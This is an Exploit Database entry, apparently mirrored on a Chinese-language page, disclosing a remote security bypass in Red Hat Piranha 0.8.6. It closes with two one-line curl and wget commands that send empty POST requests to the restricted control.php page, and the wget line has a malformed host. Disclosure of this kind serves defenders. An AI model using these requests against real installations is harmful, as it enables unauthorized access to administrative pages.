RedHat Piranha – Remote Security Bypass

• Exploit Database
• 18 阅读

• 作者： Andreas Schiermeier
  日期： 2013-12-11
• 类别：

  • remote
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/39097/

• source: https://www.securityfocus.com/bid/65587/info
  
  Red Hat Piranha is prone to a remote security bypass vulnerability.
  
  An attacker can exploit this issue to gain unauthorized access to the restricted pages of the application, this may lead to further attacks.
  
  Red Hat Piranha 0.8.6 is vulnerable; other versions may also be affected. 
  
  curl -d'' -I http://www.example.com:3636/secure/control.php 
  wget -qO- --post-data='' http://www.example.com3636/secure/control.php